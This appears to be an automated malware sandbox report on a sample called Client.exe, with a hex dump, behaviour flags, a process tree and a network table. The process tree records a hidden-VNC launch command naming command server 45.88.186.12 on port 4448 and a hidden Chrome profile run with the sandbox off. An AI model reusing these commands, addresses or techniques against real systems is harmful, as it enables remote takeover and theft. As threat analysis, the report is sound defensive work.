000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff82ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff83ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE
"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\Desktop\SwitchWait.xml"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\SwitchWait.xml
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffaf04bab58,0x7ffaf04bab68,0x7ffaf04bab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1496 --field-trial-handle=1804,i,7785550897413441954,2429724585814514226,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1804,i,7785550897413441954,2429724585814514226,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2188 --field-trial-handle=1804,i,7785550897413441954,2429724585814514226,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3088 --field-trial-handle=1804,i,7785550897413441954,2429724585814514226,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3168 --field-trial-handle=1804,i,7785550897413441954,2429724585814514226,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4248 --field-trial-handle=1804,i,7785550897413441954,2429724585814514226,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4400 --field-trial-handle=1804,i,7785550897413441954,2429724585814514226,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4448 --field-trial-handle=1804,i,7785550897413441954,2429724585814514226,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4660 --field-trial-handle=1804,i,7785550897413441954,2429724585814514226,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4744 --field-trial-handle=1804,i,7785550897413441954,2429724585814514226,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4828 --field-trial-handle=1804,i,7785550897413441954,2429724585814514226,131072 /prefetch:8
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 45.88.186.12 4448 HVNC_MUTEX
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-sandbox --allow-no-sandbox-job --disable-accelerated-layers --disable-accelerated-plugins --disable-audio --disable-gpu --disable-d3d11 --disable-accelerated-2d-canvas --disable-deadline-scheduling --disable-ui-deadline-scheduling --aura-no-shadows --mute-audio
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\VenHide /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Google\Chrome\VenHide\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\VenHide --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffaf04bab58,0x7ffaf04bab68,0x7ffaf04bab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1540 --field-trial-handle=1904,i,4579930726394183583,17033996586093192616,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --mojo-platform-channel-handle=1896 --field-trial-handle=1904,i,4579930726394183583,17033996586093192616,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --mojo-platform-channel-handle=1984 --field-trial-handle=1904,i,4579930726394183583,17033996586093192616,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --first-renderer-process --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2704 --field-trial-handle=1904,i,4579930726394183583,17033996586093192616,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2720 --field-trial-handle=1904,i,4579930726394183583,17033996586093192616,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --extension-process --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3320 --field-trial-handle=1904,i,4579930726394183583,17033996586093192616,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --extension-process --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3328 --field-trial-handle=1904,i,4579930726394183583,17033996586093192616,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3472 --field-trial-handle=1904,i,4579930726394183583,17033996586093192616,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --mojo-platform-channel-handle=3264 --field-trial-handle=1904,i,4579930726394183583,17033996586093192616,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --mojo-platform-channel-handle=4036 --field-trial-handle=1904,i,4579930726394183583,17033996586093192616,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --mojo-platform-channel-handle=4084 --field-trial-handle=1904,i,4579930726394183583,17033996586093192616,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --mojo-platform-channel-handle=4296 --field-trial-handle=1904,i,4579930726394183583,17033996586093192616,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4332 --field-trial-handle=1904,i,4579930726394183583,17033996586093192616,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --mojo-platform-channel-handle=4100 --field-trial-handle=1904,i,4579930726394183583,17033996586093192616,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --mojo-platform-channel-handle=4412 --field-trial-handle=1904,i,4579930726394183583,17033996586093192616,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --mojo-platform-channel-handle=4408 --field-trial-handle=1904,i,4579930726394183583,17033996586093192616,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --mojo-platform-channel-handle=4500 --field-trial-handle=1904,i,4579930726394183583,17033996586093192616,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0x7ff63e88ae48,0x7ff63e88ae58,0x7ff63e88ae68
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\chrmstp.exe" --system-level --verbose-logging --installerdata="C:\Program Files\Google\Chrome\Application\master_preferences" --create-shortcuts=1 --install-level=0
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0x7ff63e88ae48,0x7ff63e88ae58,0x7ff63e88ae68
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --mojo-platform-channel-handle=4292 --field-trial-handle=1904,i,4579930726394183583,17033996586093192616,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --extension-process --enable-chrome-cart --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4744 --field-trial-handle=1904,i,4579930726394183583,17033996586093192616,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --enable-chrome-cart --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=4580 --field-trial-handle=1904,i,4579930726394183583,17033996586093192616,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --enable-chrome-cart --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=4492 --field-trial-handle=1904,i,4579930726394183583,17033996586093192616,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\VenHide" --mojo-platform-channel-handle=3516 --field-trial-handle=1904,i,4579930726394183583,17033996586093192616,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 --field-trial-handle=1804,i,7785550897413441954,2429724585814514226,131072 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 45.88.186.12:5050 | tcp | |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 45.88.186.12:5050 | tcp | |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| GB | 142.250.179.238:443 | play.google.com | tcp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 45.88.186.12:4448 | tcp | |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
